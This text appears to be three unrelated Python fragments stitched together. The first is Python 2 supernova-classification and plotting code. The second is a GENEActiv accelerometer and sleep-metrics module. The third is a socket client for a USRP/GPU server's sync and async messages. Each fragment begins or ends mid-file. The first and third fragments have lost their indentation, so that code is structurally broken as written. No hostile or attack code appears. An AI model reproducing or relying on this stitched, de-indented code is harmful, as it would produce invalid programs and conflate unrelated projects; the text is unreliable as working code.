for data in MLdatalist: #loop over data to plot; always include Test for plots requiring CLF classified data (eg HR plots)
if(data==Test): #setup entries to fill dicts
#obslabel='Test'
obsdata=data_test
obsdata['true_mu']=obsdata['sim_mu']
obsIa=obsdata['sim_nonIa']==0
obsCC=obsdata['sim_nonIa']>0
obsIbc=obsdata['type3']==1
obsII=obsdata['type3']==2
elif(data==Spec):
#obslabel='Spec.'
obsdata=data_spec
obsIa=obsdata['spec_eval']=='SNIa'
obsCC=obsdata['spec_eval']!='SNIa'
obsII=obsdata['spec_eval']=='SNII'
obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII')
elif(data==Spec_nofp):
#obsdata=data_spec_nofp
obslabel='Spec. No $f_p$ Cut '
obsIa=obsdata['spec_eval']=='SNIa'
obsCC=obsdata['spec_eval']!='SNIa'
obsII=obsdata['spec_eval']=='SNII'
obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII')
elif(data==Phot):
#obslabel='Phot.'
obsdata=data_phot
#special case of phot test data
if('sim_mu' in obsdata.keys()):
obsdata['true_mu']=obsdata['sim_mu']
#unknown true types; all False masks
obsIa=np.zeros(len(obsdata['snid']),dtype=bool)
obsCC=np.zeros(len(obsdata['snid']),dtype=bool)
obsIbc=np.zeros(len(obsdata['snid']),dtype=bool)
obsII=np.zeros(len(obsdata['snid']),dtype=bool)
#save mask
mask[data]={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII}
omask={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII}
#save label
#plotlabels[Data][data]=plotlabels[Data][data]+' Data'
#ML-type labeled observed data
if(not(data in predict.keys())): #data_test already typed and predictions printed
predict[data]={}
X_data = get_features(args.ft, obsdata)
dataprobs=clf.predict_proba(X_data)
predict[data][Ia] = dataprobs[:, 0]>P_eff_ref
predict[data][CC] = ~predict[data][Ia]
#compute true mu
cosmo = FlatLambdaCDM(H0=H0, Om0=OmegaM)
obsdata['true_mu']=cosmo.distmod(obsdata['z'])
if (args.nclass==3):
predict[data][II]=(dataprobs[:,0]<P_eff_ref) & (dataprobs[:,2]>dataprobs[:,1])
predict[data][Ibc]=(~predict[data][Ia]) & (~predict[data][II])
#print summary
print
for t in MLtypes:
print 'Predicted number of {} Data {} with P_thresh {:0.3f} = {}'.format(data,
t, float(P_eff_ref), np.sum(predict[data][t]))
#fill and print some more stats
CLFstats[data]={}
if((np.sum(omask[Ia]) + np.sum(omask[CC])) > 0):
CLFstats[data][TP]={Ia:(predict[data][Ia] & omask[Ia]),CC:(predict[data][CC] & omask[CC])}
CLFstats[data][FP]={Ia:(predict[data][Ia] & ~omask[Ia]),CC:(predict[data][CC] & ~omask[CC])}
if (args.nclass==3):
CLFstats[data][TP][II]= predict[data][II] & omask[II]
CLFstats[data][TP][Ibc]= predict[data][Ibc] & omask[Ibc]
CLFstats[data][FP][II]= predict[data][II] & ~omask[II]
CLFstats[data][FP][Ibc]= predict[data][Ibc] & ~omask[Ibc]
for t in MLtypes:
print 'Correct (true positive) number of {} Data {} = {}'.format(data,t, np.sum(CLFstats[data][TP][t]))
print 'Incorrect (false positive) number of {} Data {} = {}'.format(data,t,np.sum(CLFstats[data][FP][t]))
else:
print "{} data is unlabeled: true types not available".format(data)
#augment variables in data here
if ('true_mu' in obsdata.keys()):
obsdata[HR]=obsdata['mu']-obsdata['true_mu'] #Hubble Residual
#now fill dict if not already included
if(not(data in alldata.keys())):
alldata[data]={Ia:obsdata[obsIa],CC:obsdata[obsCC],Ibc:obsdata[obsIbc],II:obsdata[obsII],Total:obsdata}
#add CLFtype, TP and FP types to data dict
for t in MLtypes:
alldata[data][CLFid+t]=obsdata[predict[data][t]]
if(TP in CLFstats[data].keys()):
alldata[data][CLFid+TP+t]=obsdata[CLFstats[data][TP][t]]
alldata[data][CLFid+FP+t]=obsdata[CLFstats[data][FP][t]]
#add CLFTotal for consistency and weights; no totals for TP and FP types
alldata[data][CLFid+Total]=obsdata
#summarize extra data to be plotted
if(data in datalist):
print "\nPlotting",plotlabels[Data][data],'as "observed" data:'
for t in alldata[data].keys():
print "Number of type {} = {}".format(t,len(alldata[data][t]))
#endfor-datalist
#special printout here
if(data==Spec):
print alldata[Spec][RFFPIa]['snid']
print alldata[Spec][RFFPIa]['spec_eval']
print alldata[Spec][RFFPIa]['fit_pr']
print alldata[Spec][RFFPIa]['x1']
print alldata[Spec][RFFPIa]['c']
print alldata[Spec][RFFPIa]['z']
print alldata[Spec][RFFPIa]['mB']
#compute normalizations and weights for data plots (scale sims/secondary data by primary observed data set)
weights={}
if(len(datalist)>0):
data0=datalist[0] #primary observed dataset in datalist
#print alldata[data0].keys()
#lengths=[len(alldata[data0][key]) for key in alldata[data0].keys()]
#print lengths
for key in alldata.keys(): #compute renormalization factors
print '\nNormalization factors for {} Data:\n'.format(key)
weights={}
if(args.weights==ByType): #accumulate weights by type
norm={}
#for t in MLtypes + CLFtypes:
for t in MLtypes + CLFtypes + allTPFPtypes:
if(alldata[key].has_key(t) and len(alldata[key][t])>0): #t exists and has data
if (len(datalist)>0):
if(alldata[data0].has_key(t) and len(alldata[data0][t])>0): #t exists and has data
norm[t]=float(len(alldata[data0][t]))/float(len(alldata[key][t]))
else:
print "Type {} not available for {} Data".format(t,data0)
#for Phot data, only CLF weights available;
btyp=t[t.find('I'):len(t)] if 'I' in t else CC #parse t to find base SN type
subt=CLFid+btyp
print "Computing weights using type {} instead".format(subt)
if(alldata[key].has_key(subt) and len(alldata[key][subt])>0): #Training data doesn't have CLF types
norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][subt]))
elif(alldata[key].has_key(btyp)):
print "Type {} not available for {} Data".format(subt,key)
norm[t]=float(len(alldata[data0][subt]))/float(len(alldata[key][btyp]))
print "Computing weights using type {} instead".format(btyp)
else:
"No appropriate substitute weights for {} in {} and {}".format(t, key, data0)
else:
norm[t]=1.0
weights[t]=np.array([norm[t]]*len(alldata[key][t]))
print "Setting up {} {} weights for type {}".format(len(alldata[key][t]), args.weights, t)
else:
norm[t]=0.0
print "No data: Skipping {} weights for type {}".format(args.weights, t)
print 'n({}) ={:0.3f}\n'.format(t, norm[t])
#Total weights need different values for each type
#Check cases for which type does not exist in data (no Ia etc. in Phot data)
#print norm.keys()
if (key!=Phot):
weights[Total]=np.array([norm[Ia]]*len(alldata[key][Total]))
if(key!=Training):
weights[CLFid+Total]=np.array([norm[CLFid+Ia]]*len(alldata[key][Total]))
if (key!=Phot) and (key!=Training):
#if (norm.has_key(CLFid+TP+Ia)):
weights[CLFid+TP+Total]=np.array([norm[CLFid+TP+Ia]]*len(alldata[key][Total]))
#else:
# weights[CLFid+TP+Total]=np.array([0.]*len(alldata[key][Total]))
#if (norm.has_key(CLFid+FP+Ia)):
weights[CLFid+FP+Total]=np.array([norm[CLFid+FP+Ia]]*len(alldata[key][Total]))
#else:
# weights[CLFid+FP+Total]=np.array([0.]*len(alldata[key][Total]))
if (args.nclass==3): #overwrite array to match MLtypes
if (key!=Phot):
weights[Total][mask[key][Ibc]]=norm[Ibc]
weights[Total][mask[key][II]]=norm[II]
if(key!=Training):
weights[CLFid+Total][predict[key][Ibc]]=norm[CLFid+Ibc]
weights[CLFid+Total][predict[key][II]]=norm[CLFid+II]
if (key!=Phot) and (key!=Training):
weights[CLFid+TP+Total][CLFstats[key][TP][Ibc]]=norm[CLFid+TP+Ibc]
weights[CLFid+FP+Total][CLFstats[key][FP][Ibc]]=norm[CLFid+FP+Ibc]
weights[CLFid+TP+Total][CLFstats[key][TP][II]]=norm[CLFid+TP+II]
weights[CLFid+FP+Total][CLFstats[key][FP][II]]=norm[CLFid+FP+II]
else:
if (key!=Phot):
weights[Total][mask[key][CC]]=norm[CC]
if(key!=Training):
weights[CLFid+Total][predict[key][CC]]=norm[CLFid+CC]
if (key!=Phot) and (key!=Training):
weights[CLFid+TP+Total][CLFstats[key][TP][CC]]=norm[CLFid+TP+CC]
weights[CLFid+FP+Total][CLFstats[key][FP][CC]]=norm[CLFid+FP+CC]
else:
#constant weights (calculate for all keys even if not needed for Training etc. data)
if (len(datalist)>0):
weights[Total]=np.array([float(len(alldata[data0]))/float(len(alldata[key]))]*len(alldata[key][Total]))
else:
weights[Total]=np.array([1.0]*len(alldata[key][Total]))
weights[CLFid+Total]=weights[Total]
weights[CLFid+TP+Total]=weights[Total]
weights[CLFid+FP+Total]=weights[Total]
#save in dict
alldata[key][Weights]=weights
#print key,alldata[key][Weights].keys()
#old format
#Iaweights=np.array([normIa]*len(sim[Ia]))
#CCweights=np.array([normCC]*len(sim[CC]))
#Ibcweights=np.array([normIbc]*len(sim[Ibc]))
#IIweights=np.array([normII]*len(sim[II]))
#save SN Totals in dict for cuts
SNTotals={}
for key in alldata.keys():
SNTotals[key]={}
for t in plottypes:
if(t in alldata[key].keys()):
SNTotals[key][t]=float(len(alldata[key][t]))
#print key, t, SNTotals[key][t]
print '\nDefault plottypes=',str(plottypes)
# PLOT VARIABLES ###################
npages=1
###################################################################
#page probs
print "\nStarting page",npages,"(page probs)"
#populate dict of probabilities for Test Data using array from probs dict
CLFprobs={}
data = Test
for t in MLtypes:
CLFprobs[t]={'probs':probs[data][true[data][t]]}
fig = plt.figure(figsize=(15,7))
p_binwidth = 0.05
p_bins = np.arange(-0.1, 1.05, p_binwidth)
f = fig.add_subplot(231)
plot_types(MLtypes,'probs',CLFprobs,xlabel='Random Forest | |
<gh_stars>1-10
import pandas as pd
import struct
import numpy as np
from more_itertools import run_length
from bitstring import BitArray
from scipy import signal
def bin2df(full_path):
    """
    Read a GENEActiv .bin file into a pandas dataframe.

    Parameters
    ----------
    full_path : str
        Full path to the geneactiv .bin file.

    Returns
    -------
    df : dataframe
        Decoded geneactiv data with columns X, Y, Z, LUX, T, indexed by
        per-sample timestamp.
    """
    with open(full_path, "rb") as in_file:
        # First line is read and discarded before the loop; the loop body
        # immediately reads the next line, so line 1 is never parsed.
        full_line = in_file.readline()
        count = 0
        fs = ""
        df = []
        while full_line:
            full_line = in_file.readline()
            line = full_line[:].split(b"\r\n")[0]
            count += 1
            if count < 60:
                # File header: harvest per-axis calibration constants.
                if b"x gain" in line:
                    x_gain = int(line.split(b":")[-1])
                if b"x offset" in line:
                    x_offset = int(line.split(b":")[-1])
                if b"y gain" in line:
                    y_gain = int(line.split(b":")[-1])
                if b"y offset" in line:
                    y_offset = int(line.split(b":")[-1])
                if b"z gain" in line:
                    z_gain = int(line.split(b":")[-1])
                if b"z offset" in line:
                    z_offset = int(line.split(b":")[-1])
                if b"Volts" in line:
                    volts = int(line.split(b":")[-1])
                if b"Lux" in line:
                    lux = int(line.split(b":")[-1])
            if b"Page Time:" in line:
                # Timestamp of the first sample of the current 300-sample page.
                time = pd.to_datetime(
                    ":".join(line.decode().split(":")[1:])[0:-2],
                    format="%Y-%m-%d %H:%M:%S:%f",
                )
            if b"Temperature:" in line:
                temp = float(line.split(b":")[-1])
            if not fs:
                if b"Measurement Frequency:" in line:
                    fs = float(line.split(b":")[-1].split(b" ")[0])
                    # Per-sample time offsets within a 300-sample page,
                    # computed once from the sampling frequency.
                    offset = np.array([1 / fs] * 300) * np.arange(0, 300)
                    delta = pd.to_timedelta(offset, unit="s")
            if len(line) == 3600:
                # Data page: 300 samples, each packed as 12 hex characters
                # (48 bits: 12-bit X, Y, Z, 10-bit LUX, button, reserved).
                hexes = struct.unpack(b"12s " * 300, line)
                bins = (
                    struct.unpack(
                        b"12s 12s 12s 10s 1s 1s",
                        bin(int(hx, 16))[2:].zfill(48).encode(),
                    )
                    for hx in hexes
                )
                decode = pd.DataFrame(
                    bins,
                    columns=["X", "Y", "Z", "LUX", "Button", "_"],
                    index=pd.DatetimeIndex([time] * 300) + delta,
                )
                # Two's-complement decode of each 12-bit axis value, then
                # apply the per-axis calibration constants from the header.
                decode.X = decode.X.apply(
                    lambda x: round(
                        (BitArray(bin=x.decode()).int * 100.0 - x_offset) / x_gain, 4
                    )
                )
                decode.Y = decode.Y.apply(
                    lambda x: round(
                        (BitArray(bin=x.decode()).int * 100.0 - y_offset) / y_gain, 4
                    )
                )
                decode.Z = decode.Z.apply(
                    lambda x: round(
                        (BitArray(bin=x.decode()).int * 100.0 - z_offset) / z_gain, 4
                    )
                )
                decode.LUX = decode.LUX.apply(lambda x: int(int(x, 2) * lux / volts))
                decode["T"] = temp
                df.append(decode)
    df = pd.concat(df, axis=0)
    df.index.name = "Time"
    # BUGFIX: removed a debugging leftover that wrote the whole decoded frame
    # to a hard-coded per-user Windows path (r'C:\Users\tdavi\...') with
    # index=False, silently dropping the timestamps. Callers can persist the
    # returned frame themselves.
    return df[["X", "Y", "Z", "LUX", "T"]]
def non_overlapping_windows(df, window_size):
    """
    Slice the input frame into consecutive, non-overlapping windows.

    Parameters
    ----------
    df : data frame
        Data to be windowed along the vertical (row) axis.
    window_size : int
        Window size in number of samples.

    Returns
    -------
    windowed_data : numpy array
        Array of shape [num_windows, window_size, num_columns]; trailing
        rows that do not fill a whole window are dropped.
    """
    values = np.asarray(df)
    n_rows, n_cols = values.shape
    n_windows = n_rows // window_size
    trimmed = values[: n_windows * window_size]
    return trimmed.reshape(n_windows, window_size, n_cols)
def activity_index(windowed_array):
    """
    Compute the activity index of a windowed tri-axial accelerometer signal.

    The activity index is defined here as::

        sqrt(mean(vx, vy, vz))

    where vx, vy, vz are the per-axis variances of the signal over the
    samples of each window.

    Parameters
    ----------
    windowed_array : array-like
        Tri-axis accelerometer signal with dimensions
        [number of windows, samples per window, 3].

    Returns
    -------
    activity_indices : numpy array
        Column vector (shape [number of windows, 1]) of activity indices.
    """
    # BUGFIX: the variance must be taken over time within each window
    # (axis=1), per axis, to match the documented definition. Previously it
    # was taken across the X/Y/Z channels at each sample (axis=2), which
    # measures inter-axis spread, not movement over time.
    per_axis_variance = np.var(windowed_array, axis=1)  # shape [n_windows, 3]
    activity_indices = (per_axis_variance.mean(axis=1) ** 0.5).reshape(-1, 1)
    return activity_indices
def high_pass_filter(windowed_array, sampling_rate, hp_cutoff, order):
    """
    Apply a zero-phase Butterworth high-pass filter to a windowed signal.

    Parameters
    ----------
    windowed_array : array-like
        Windowed sensor signal, shape
        [number_of_windows, samples_per_window, number_of_data_channels].
    sampling_rate : float
        Sampling rate of the signal in Hz.
    hp_cutoff : float
        High-pass cutoff frequency in Hz.
    order : int
        Order of the Butterworth filter.

    Returns
    -------
    filtered : array-like
        High-pass-filtered data, same shape as the input.
    """
    # Normalize the cutoff to the Nyquist frequency as scipy expects.
    normalized_cutoff = [hp_cutoff * 2.0 / sampling_rate]
    b, a = signal.butter(N=order, Wn=normalized_cutoff, btype="highpass", analog=False)
    # filtfilt runs the IIR filter forward and backward for zero phase shift.
    return signal.filtfilt(b, a, windowed_array, padlen=10, axis=1)
def load_geneactiv_csv(full_path):
    """
    Load GENEActiv csv data into a pandas dataframe.

    Parameters
    ----------
    full_path : string
        Full path to a geneactiv accelerometer csv file.

    Returns
    -------
    df : data frame
        Accelerometer data (X, Y, Z), light (LUX) and temperature (T),
        indexed by timestamp. The first 100 lines (file header) are skipped.
    """
    column_names = ["Time", "X", "Y", "Z", "LUX", "Button", "T"]
    column_types = {
        "Time": object,
        "X": np.float64,
        "Y": np.float64,
        "Z": np.float64,
        "LUX": np.int64,
        "Button": bool,
        "T": np.float64,
    }
    df = pd.read_csv(
        full_path,
        index_col=0,
        skiprows=100,
        header=None,
        names=column_names,
        usecols=["Time", "X", "Y", "Z", "LUX", "T"],
        dtype=column_types,
        low_memory=False,
    )
    df.index = pd.to_datetime(df.index, format="%Y-%m-%d %H:%M:%S:%f").values
    return df[["X", "Y", "Z", "LUX", "T"]]
def downsample_by_mean(df, fs="50L"):
    """
    Downsample a data frame to a desired frequency by mean aggregation.

    Parameters
    ----------
    df : data frame
        Data to be downsampled; must carry a pandas datetime index.
    fs : str
        Target sampling period as a pandas offset alias (default "50L",
        i.e. 50 ms / 20 Hz).

    Returns
    -------
    Downsampled data frame.
    """
    resampler = df.resample(fs)
    return resampler.mean()
def downsample(df, factor):
    """
    Downsample a data frame by an integer factor with an antialiasing filter.

    Parameters
    ----------
    df : data frame
        Data to be downsampled; must carry a pandas datetime index.
    factor : int
        Factor by which to downsample.

    Returns
    -------
    df : data frame
        Downsampled data frame spanning the same start/end timestamps,
        with the original column names.
    """
    # Keep the original time span and column names for the result.
    first_timestamp = df.index[0]
    last_timestamp = df.index[-1]
    column_names = df.columns
    # scipy's decimate low-pass filters before discarding samples.
    decimated = signal.decimate(df.values, q=factor, axis=0)
    # Spread the surviving samples evenly across the original time span.
    new_index = pd.date_range(first_timestamp, last_timestamp, len(decimated))
    result = pd.DataFrame(decimated)
    result.index = new_index
    result.columns = column_names
    return result
def make_dummy_data(freq="50L"):
    """
    Build dummy sleep data: 24 hours of random samples, a low-motion sleep
    window from 10pm to 7am, temperature fixed at 27 degrees Celsius.

    Parameters
    ----------
    freq : string
        Sampling period as a pandas offset alias. Default "50L" is 20 Hz;
        "10L" would be 100 Hz.

    Returns
    -------
    input_df, start_sleep, end_sleep : 3-tuple
        Data frame of dummy data and the start/end of the sleep window.
    """
    stamp_format = "%Y-%m-%d %H:%M:%S:%f"
    # Recording spans a full day, noon to noon.
    start = pd.to_datetime("2018-01-01 12:00:00:000", format=stamp_format)
    end = pd.to_datetime("2018-01-02 12:00:00:000", format=stamp_format)
    # Sleep window inside the recording.
    start_sleep = pd.to_datetime("2018-01-01 22:00:00:000", format=stamp_format)
    end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format=stamp_format)
    timestamps = pd.date_range(start, end, freq=freq)
    # Random accelerometer-like values everywhere...
    input_df = pd.DataFrame(np.random.uniform(-100, 100, [len(timestamps), 5]))
    input_df.columns = ["X", "Y", "Z", "T", "LUX"]
    input_df.index = timestamps
    # ...except near-zero motion during the sleep window, constant
    # temperature, and an independent random light channel.
    input_df[start_sleep:end_sleep] = 0.001
    input_df["T"] = 27.0
    input_df["LUX"] = np.random.uniform(0, 80, [len(timestamps)])
    return input_df, start_sleep, end_sleep
# # START AND END DATES
# start = pd.to_datetime("2018-01-01 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
# end = pd.to_datetime("2018-01-02 12:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
#
# # SLEEP PERIOD
# start_sleep = pd.to_datetime(
# "2018-01-01 22:00:00:000", format="%Y-%m-%d %H:%M:%S:%f"
# )
# end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format="%Y-%m-%d %H:%M:%S:%f")
def import_dummy_data(json_data, freq="50L"):
    """
    Wrap externally supplied sample data in the dummy-sleep-data layout.

    Parameters
    ----------
    json_data : array-like
        Sample values with five channels (X, Y, Z, T, LUX); its length must
        match the generated timestamp index for the chosen frequency.
    freq : string
        Sampling period as a pandas offset alias. Default "50L" is 20 Hz.

    Returns
    -------
    df, start_sleep, end_sleep : 3-tuple
        Data frame of the supplied data and the start/end of the fixed
        sleep window (10pm to 7am).
    """
    stamp_format = "%Y-%m-%d %H:%M:%S:%f"
    # Fixed recording span: noon to 02:33:48.700 the following day.
    start = pd.to_datetime("2018-01-01 12:00:00:000", format=stamp_format)
    end = pd.to_datetime("2018-01-02 2:33:48:700", format=stamp_format)
    # Fixed sleep window.
    start_sleep = pd.to_datetime("2018-01-01 22:00:00:000", format=stamp_format)
    end_sleep = pd.to_datetime("2018-01-02 7:00:00:000", format=stamp_format)
    timestamps = pd.date_range(start, end, freq=freq)
    frame = pd.DataFrame(json_data, columns=["X", "Y", "Z", "T", "LUX"], index=timestamps)
    return frame, start_sleep, end_sleep
def total_sleep_time(predictions):
    """
    Total sleep time from an array of per-minute sleep/wake predictions.

    Parameters
    ----------
    predictions : array-like
        Binary predictions, one per one-minute epoch: awake = 1, sleep = 0.

    Returns
    -------
    tst : int
        Number of epochs (minutes) spent asleep.
    """
    awake_epochs = predictions.sum()
    return int(len(predictions) - awake_epochs)
def percent_time_asleep(predictions):
    """
    Percentage of time asleep from per-minute sleep/wake predictions.

    Parameters
    ----------
    predictions : array-like
        Binary predictions, one per one-minute epoch: awake = 1, sleep = 0.

    Returns
    -------
    pta : float
        Percentage of epochs spent asleep, rounded to three decimals.
    """
    asleep_epochs = len(predictions) - predictions.sum()
    pta = 100.0 * asleep_epochs / float(len(predictions))
    return np.round(pta, decimals=3)
def number_of_wake_bouts(predictions):
"""
Calculates the number of wake bouts present in an array of sleep/wake predictions in one minute epochs. Number of
| |
port.
- timeout: timeout in seconds to wait for connection.
Known bugs:
- On some linux distribution once on two attempts the connection is denied by software. On third attempt however it connects.
Returns:
- True: if connection was succesfull.
- False if no connection was established.
Examples:
>>> if(USRP_socket_bind(USRP_data_socket, USRP_server_address_data, 5)):
# do stuff with function in this library
>>> else:
>>> print "No connection, check hardware and configs."
Notes:
- This method will only connect one soket to the USRP/GPU server, not data and async messages. This function is intended to be used in higher level functions contained in this library. The correct methot for connecting to USRP/GPU server is the use of USERP_Connect(timeout) function.
"""
if timeout < 0:
print_warning("No GPU server connection established after timeout.")
return False
else:
try:
USRP_socket.connect(server_address)
return True
except socket.error as msg:
print(("Socket binding " + str(msg) + ", " + "Retrying..."))
return False
USRP_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
USRP_socket.settimeout(1)
USRP_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
time.sleep(1)
timeout = timeout - 1
return USRP_socket_bind(USRP_socket, server_address, timeout)
def Decode_Sync_Header(raw_header, CLIENT_STATUS=CLIENT_STATUS):
    '''
    Decode a sync packet header containing the metadata of the packet.

    Arguments:
        - raw_header: the raw header as a string (as returned by the recv()
          method of socket).

    Return:
        - The metadata in dictionary form, or None if the header could not
          be parsed.
    '''
    # Single-letter front-end codes to human-readable front-end names.
    frontend_names = {
        'A': "A_TXRX",
        'B': "A_RX2",
        'C': "B_TXRX",
        'D': "B_RX2"
    }
    try:
        packet = np.fromstring(raw_header, dtype=header_type, count=1)[0]
        metadata = {}
        metadata['usrp_number'] = packet['usrp_number']
        metadata['front_end_code'] = frontend_names[packet['front_end_code']]
        metadata['packet_number'] = packet['packet_number']
        metadata['length'] = packet['length']
        metadata['errors'] = packet['errors']
        metadata['channels'] = packet['channels']
        return metadata
    except ValueError:
        # Suppress the error report while a user-requested disconnect is
        # in progress.
        if CLIENT_STATUS["keyboard_disconnect"] == False:
            print_error("Received corrupted header. No recover method has been implemented.")
        return None
def Print_Sync_Header(header):
print "usrp_number" + str(header['usrp_number'])
print "front_end_code" + str(header['front_end_code'])
print "packet_number" + str(header['packet_number'])
print "length" + str(header['length'])
print "errors" + str(header['errors'])
print "channels" + str(header['channels'])
def Decode_Async_header(header):
    '''Extract the length of an async message from the header of an async
    package incoming from the GPU server.

    The header is two native int32 values: a marker (must be 0) followed by
    the payload length. Returns the payload length, or 0 when the marker is
    not zero (i.e. the header is not a valid async header).
    '''
    # np.frombuffer replaces np.fromstring, which is deprecated (it emits a
    # DeprecationWarning since NumPy 1.14); the decoded values are identical.
    header = np.frombuffer(header, dtype=np.int32, count=2)
    if header[0] == 0:
        return header[1]
    else:
        return 0
def Decode_Async_payload(message):
    '''
    Decode asynchronous JSON payloads coming from the GPU server and update
    the module-level measurement state (ERROR_STATUS, END_OF_MEASURE,
    REMOTE_FILENAME) accordingly.
    '''
    global ERROR_STATUS, END_OF_MEASURE, REMOTE_FILENAME, EOM_cond
    try:
        res = json.loads(message)
    except ValueError:
        print_warning("Cannot decode response from server.")
        return
    try:
        atype = res['type']
    except KeyError:
        print_warning("Unexpected json string from the server: type")
        # BUGFIX: bail out on a message without a 'type' key; previously
        # execution fell through and raised NameError on the unbound 'atype'
        # referenced below.
        return
    # print "FROM SERVER: "+str(res['payload'])
    if atype == 'ack':
        if res['payload'].find("EOM") != -1:
            # End-of-measure notification: set the shared flag under its lock.
            print_debug("Async message from server: Measure finished")
            EOM_cond.acquire()
            END_OF_MEASURE = True
            EOM_cond.release()
        elif res['payload'].find("filename") != -1:
            # Server communicated the remote output filename (quoted string).
            REMOTE_FILENAME = res['payload'].split("\"")[1]
        else:
            print_debug("Ack message received from the server: " + str(res['payload']))
    if atype == 'nack':
        # Server-side error: record it and end the measure.
        print_warning("Server detected an error.")
        ERROR_STATUS = True
        EOM_cond.acquire()
        END_OF_MEASURE = True
        EOM_cond.release()
def Encode_async_message(payload):
    '''
    Format a JSON string so that the GPU server can read it.

    Arguments:
        - payload: A JSON string.

    Returns:
        - A formatted string ready to be sent via socket method

    Note:
        This function performs no check on the validity of the JSON string.
    '''
    # Wire format: a zero int32 marker, the payload length, then the payload.
    preamble = struct.pack('I', 0) + struct.pack('I', len(payload))
    return preamble + payload
def Async_send(payload):
    '''
    Send a JSON string to the GPU server. Typically the JSON string
    represents a command or a status request.

    Arguments:
        - payload: JSON formatted string.

    Returns:
        - Boolean value representing the success of the operation.

    Note:
        In order to use this function the Async_thread has to be up and
        running. See Start_Async_RX().
    '''
    global Async_condition
    global Async_status
    global USRP_socket
    # Guard clause: refuse to send when the async thread is not running.
    if not Async_status:
        print_warning("The Async RX thread is not running, cannot send Async message.")
        return False
    try:
        USRP_socket.send(Encode_async_message(payload))
    except socket.error as err:
        print_warning("An async message could not be sent due to an error: " + str(err))
        if err.errno == 32:
            # Broken pipe: the server went away; mark the thread as down.
            print_error("Async server disconnected")
            Async_condition.acquire()
            Async_status = False
            Async_condition.release()
            return False
    return True
def Async_thread():
    '''Receiver thread for async messages from the GPU server. This function is meant to be run as a thread.'''
    global Async_condition
    global Async_status
    global USRP_socket
    global USRP_server_address
    internal_status = True
    Async_status = False
    # The header is composed of two ints: one is always 0 and the other
    # represents the length of the payload.
    header_size = 2 * 4
    # just initialization of variables
    old_header_len = 0
    old_data_len = 0
    # try to connect, if it fails set internal status to False (close the thread)
    Async_condition.acquire()
    # if(not USRP_socket_bind(USRP_socket, USRP_server_address, 5)):
    time_elapsed = 0
    timeout = 10  # sys.maxint
    data_timeout_wait = 0.01
    connected = False
    while time_elapsed < timeout and (not connected):
        try:
            print_debug("Async command thread:")
            connected = USRP_socket_bind(USRP_socket, USRP_server_address, 7)
            time.sleep(1)
            time_elapsed += 1
        except KeyboardInterrupt:
            print_warning("Keyboard interrupt aborting connection...")
            break
    if not connected:
        internal_status = False
        Async_status = False
        print_warning("Async data connection failed")
        Async_condition.release()
    else:
        Async_status = True
        print_debug("Async data connected")
        Async_condition.release()
    # acquisition loop
    while (internal_status):
        # counters used to prevent the API from getting stuck on server shutdown
        data_timeout_counter = 0
        data_timeout_limit = 5
        header_timeout_limit = 5
        header_timeout_counter = 0
        header_timeout_wait = 0.1
        # lock the "mutex" for checking the state of the main API instance
        Async_condition.acquire()
        if Async_status == False:
            internal_status = False
        Async_condition.release()
        size = 0
        if (internal_status):
            # First receive the fixed-size header...
            header_data = ""
            try:
                while (len(header_data) < header_size) and internal_status:
                    header_timeout_counter += 1
                    header_data += USRP_socket.recv(min(header_size, header_size - len(header_data)))
                    if old_header_len != len(header_data):
                        header_timeout_counter = 0
                    if (header_timeout_counter > header_timeout_limit):
                        time.sleep(header_timeout_wait)
                        Async_condition.acquire()
                        if Async_status == False:
                            internal_status = False
                        # print internal_status
                        Async_condition.release()
                    old_header_len = len(header_data)
                    # general timer
                    time.sleep(.1)
                if (internal_status): size = Decode_Async_header(header_data)
            except socket.error as msg:
                if msg.errno != None:
                    print_error("Async header: " + str(msg))
                    Async_condition.acquire()
                    internal_status = False
                    Async_status = False
                    Async_condition.release()
        if (internal_status and size > 0):
            # ...then receive the payload of the length announced in the header.
            data = ""
            try:
                while (len(data) < size) and internal_status:
                    data_timeout_counter += 1
                    data += USRP_socket.recv(min(size, size - len(data)))
                    if old_data_len != len(data):
                        data_timeout_counter = 0
                    if (data_timeout_counter > data_timeout_limit):
                        time.sleep(data_timeout_wait)
                        Async_condition.acquire()
                        if Async_status == False:
                            internal_status = False
                        Async_condition.release()
                    old_data_len = len(data)
                if (internal_status): Decode_Async_payload(data)
            except socket.error as msg:
                if msg.errno == 4:
                    pass  # the ctrl-c exception is handled elsewhere
                elif msg.errno != None:
                    print_error("Async thread: " + str(msg))
                    Async_condition.acquire()
                    internal_status = False
                    Async_status = False
                    Async_condition.release()
                    # BUGFIX: msg is a socket.error instance; concatenating it
                    # to a str raised TypeError (sibling messages above already
                    # use str(msg)).
                    print_warning("Async connection is down: " + str(msg))
    # NOTE(review): if the initial connection failed this still calls
    # shutdown() on a never-connected socket, which can raise — confirm
    # whether that path is reachable in practice.
    USRP_socket.shutdown(1)
    USRP_socket.close()
    del USRP_socket
    gc.collect()
# Background daemon thread that receives async messages from the GPU server.
# It is started (and rebuilt after a previous run) by Start_Async_RX();
# daemon=True so it never blocks interpreter shutdown.
Async_RX_loop = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={})
Async_RX_loop.daemon = True
def Wait_for_async_connection(timeout=None):
    '''
    Block until the async thread has established a connection with the server
    or the thread has expired. In case a timeout value is given, returns
    after the timeout if no connection is established before.

    Arguments:
        - timeout: seconds to wait for connection. Default is infinite timeout.

    Return:
        - boolean representing the success of the operation.
    '''
    global Async_condition
    global Async_status
    time_elapsed = 0
    # BUGFIX: initialize the result so a non-positive timeout (loop body
    # never entered) returns False instead of raising NameError; this also
    # matches Wait_for_sync_connection.
    x = False
    if timeout is None:
        timeout = sys.maxint
    try:
        while time_elapsed < timeout:
            # Read the shared status flag under its lock, once per second.
            Async_condition.acquire()
            x = Async_status
            Async_condition.release()
            time.sleep(1)
            if x:
                break
            else:
                time_elapsed += 1
    except KeyboardInterrupt:
        print_warning("keyboard interrupt received. Closing connections.")
        return False
    return x
def Wait_for_sync_connection(timeout=None):
    '''
